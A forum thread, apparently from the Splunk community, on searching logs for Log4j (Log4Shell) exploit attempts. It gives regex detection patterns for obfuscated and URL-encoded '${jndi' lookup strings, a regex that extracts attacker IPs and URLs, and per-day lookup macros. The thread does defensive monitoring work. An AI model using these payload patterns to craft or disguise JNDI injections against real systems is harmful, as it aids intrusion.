I'm updating a lookup table that is tracking which indexes are affected by the new log4j exploit. I do this so that I can only have to search through the affected indexes with subsequent searches. This lookup table takes hours each time it is updated for a day. Problem being, I need to know all of the affected indexes over all of the days log4j since December 10th or so.
Query that updates lookup table:
NOT [| inputlookup log4j_indexes.csv | fields index]
| regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
Each time this query finishes, it appends log4j-exploit-affected indexes to the lookup table. I need to automate the scanning over a large timeframe (December 10th 2021 - January 5th 2022). However, I want the lookup table to update as it runs over each day. I'm trying to automate the large 25 day search to break up into 25 separate one day searches. This also makes it so that if the search fails, then I don't lose all progress. I can then apply this same methodology to other searches.
Index |
index_1 |
index_2 |
Explanation of Query below:
The gentimes part creates a table based on the selected timerange:
Earliest | Latest |
01/02/2022:00:00:00 | 01/03/2022:00:00:00 |
01/03/2022:00:00:00 | 01/04/2022:00:00:00 |
01/04/2022:00:00:00 | 01/05/2022:00:00:00 |
I try to pass those values to a subsearch as the earliest and latest parameters using map. I understand now that map doesn't seem to work for this, and I get no results when the search runs.
|gentimes start=-1
|addinfo
|eval datetime=strftime(mvrange(info_min_time,info_max_time,"1d"),"%m/%d/%Y:%H:%M:%S")
|mvexpand datetime
|fields datetime
|eval latest=datetime
|eval input_earliest=strptime(datetime, "%m/%d/%Y:%H:%M:%S") - 86400
|eval earliest=strftime(input_earliest, "%m/%d/%Y:%H:%M:%S")
|fields earliest, latest
| map search="search NOT [| inputlookup log4j_indexes.csv | fields index] earliest=$earliest$ latest=$latest$
| regex _raw=\"(\$|\%24)(\{|\%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|\%3A|\$|\%24|}|\%7D)\"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv"
Explanation of Query below:
I use gentimes in a subsearch to produce smaller timeframes from the larger selected timeframe:
Earliest | Latest |
01/02/2022:00:00:00 | 01/03/2022:00:00:00 |
01/03/2022:00:00:00 | 01/04/2022:00:00:00 |
01/04/2022:00:00:00 | 01/05/2022:00:00:00 |
This doesn't give me errors. However, I get no matches. I can almost guarantee this isn't running separate searches per value displayed in the above table. I'm not sure how this can be done.
NOT [| inputlookup log4j_indexes.csv | fields index]
[|gentimes start=-1
|addinfo
|eval datetime=strftime(mvrange(info_min_time,info_max_time,"1d"),
"%m/%d/%Y:%H:%M:%S")
|mvexpand datetime
|fields datetime
|eval latest=datetime
|eval input_earliest=strptime(datetime,"%m/%d/%Y:%H:%M:%S") - 86400
|eval earliest=strftime(input_earliest,"%m/%d/%Y:%H:%M:%S")
|fields earliest, latest]
| regex _raw="(\$|\%24)(\{|\%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|\%3A|\$|\%24|}|\%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
The solution to this "breaking up large timeframe into smaller timeframes" uses macros. Macro and the search are listed below:
- each of the macros updates the lookup table and also checks only indexes that haven't been checked for log4j. Therefore, it speeds up as more indexes are searched. The next step of this process is to use the same type of macro to narrow down affected sourcetypes.
NOT [| inputlookup log4j_indexes.csv | table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"@d")
| eval earliest=latest-(24*60*60)
| eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
| eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
| table earliest latest]
| regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=1,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=2,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=3,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=4,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=5,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=6,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=7,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| append [| inputlookup log4j_indexes.csv]
append
[search NOT [| inputlookup $lookup_table$ | table $lookup_field$]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-$day$d@d")
| eval earliest=latest-(24*60*60)
| eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
| eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
| table earliest latest]
| $search_command$
| inputlookup append=true $lookup_table$
| dedup $lookup_field$
| outputlookup $lookup_table$]
The solution to this "breaking up large timeframe into smaller timeframes" uses macros. Macro and the search are listed below:
- each of the macros updates the lookup table and also checks only indexes that haven't been checked for log4j. Therefore, it speeds up as more indexes are searched. The next step of this process is to use the same type of macro to narrow down affected sourcetypes.
NOT [| inputlookup log4j_indexes.csv | table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"@d")
| eval earliest=latest-(24*60*60)
| eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
| eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
| table earliest latest]
| regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=1,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=2,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=3,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=4,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=5,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=6,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=7,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| append [| inputlookup log4j_indexes.csv]
append
[search NOT [| inputlookup $lookup_table$ | table $lookup_field$]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-$day$d@d")
| eval earliest=latest-(24*60*60)
| eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
| eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
| table earliest latest]
| $search_command$
| inputlookup append=true $lookup_table$
| dedup $lookup_field$
| outputlookup $lookup_table$]
You could try something like this:
NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-1d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-2d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-3d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-4d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-5d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-6d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-7d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[| inputlookup indexes.csv]
Essentially, this goes back 8 days, one day at a time. You can modify the latest and earliest calculation to suit your requirement.
If you create a macro for the append parts, e.g. index_checker(1) with argument day
| append
[search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-$day$d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
The search can be reduced to this:
NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"
`index_checker(1)`
`index_checker(2)`
`index_checker(3)`
`index_checker(4)`
`index_checker(5)`
`index_checker(6)`
`index_checker(7)`
| append
[| inputlookup indexes.csv]
Does this mean that each day would run separately and in a certain order? Do they run at the same time? If not, which one would run first?
Also, you give me a great idea. I might be able to nest multiple macros to solve this in a way that can be used in other cases. 😁
Could you provide a few examples of the different iterations of the JDNI string that you are trying match against?
There are hundreds of different iterations (it seems), after using that regex. The bigger issue is trying to update the 3 lookup tables I have right now (log4j_affected_indexes.csv, log4j_affected sourcetypes.csv, and log4j_malicious_sources.csv). Log4J started showing up around December 10th, so I need to log every malicious source that I can, and then query if there was outbound communication back to those sources. This means having to query ~25 days of logs, and extracting the malicious sources from them. Doing a full 25 day search probably wouldn't go well, so breaking it up automatically into 25 searches that each last about two hours means it would take ~3 days to run, and then I query again to look for outbound communications.
I even wrote regex to extract those malicious sources (IP or URL) from the raw data:
(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)(?<Exploit>.*?)((\:|%3A)*?)(\/\/|%2F%2F)(((?<MaliciousSource_IP>(\d{1,3}(?:\.\d{1,3}){3}))(?:(.*?)))|(?<MaliciousSource_URL>((([\=\.\$\_\:\{\}]*?)|(%24)|(%7B)|(%7D))*?[\w\d\.]+?[\.\/\:\=]*?)+))((%7D|\}){1})
Simplify your searches, reconsider whether it's necessary to find every possible iteration of the jdni string and whether it's necessary to check every exploit attempt.
For example this "global" search took 4 seconds to complete against a 1TB/day Splunk environment.
("${jndi" OR "%24%7Bjndi") earliest=-7d@d
| rex "(?<jndi_string>(\$\{jndi[^\}]*\})|(%24%7Bjndi.*%7D))"
| eval jndi_string=urldecode(jndi_string)
| table _time index sourcetype jndi_string
If you have a NGEN firewall, look for LDAP or DNS outbound connections.